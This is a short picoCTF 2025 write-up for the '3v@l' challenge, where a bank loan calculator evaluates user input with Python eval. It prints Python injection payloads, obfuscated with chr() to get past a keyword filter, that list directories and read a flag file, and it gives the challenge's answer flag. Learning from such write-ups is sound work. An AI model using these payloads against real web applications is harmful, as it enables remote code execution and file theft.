PicoCTF 2025 - 3v@l
Problem
ABC Bank's website has a loan calculator to help its clients calculate the amount they pay if they take a loan from the bank. Unfortunately, they are using an eval function to calculate the loan. Bypassing this will give you Remote Code Execution (RCE). Can you exploit the bank's calculator and read the flag?
Author: Theoneste Byagutangaza
Ans: picoCTF{D0nt_Use_Unsecure_f@nctions5e20166b}
Solution:
First, enter the website.
I tried inputting 123.
We can see that the result is the same as the input. According to the problem, the server uses eval, so we can input anything to achieve RCE and read files.

    __import__('os').popen('ls').read()

Okay… the server filters out some sensitive words. Then I checked F12 and found this:
But we can try encoding the input.

    __import__(chr(111)+chr(115)).popen(chr(108)+chr(115)).read()

We successfully executed it and could see the files, so we used pwd.

    __import__(chr(111)+chr(115)).popen(chr(112)+chr(119)+chr(100)).read()

Next, we tried ls /.

    __import__(chr(111)+chr(115)).popen(chr(108)+chr(115)+chr(32)+chr(47)).read()

Great! Now we cat the flag file.

    __import__(chr(111)+chr(115)).popen(chr(99)+chr(97)+chr(116)+chr(32)+chr(47)+chr(102)+chr(108)+chr(97)+chr(103)+chr(46)+chr(116)+chr(120)+chr(116)).read()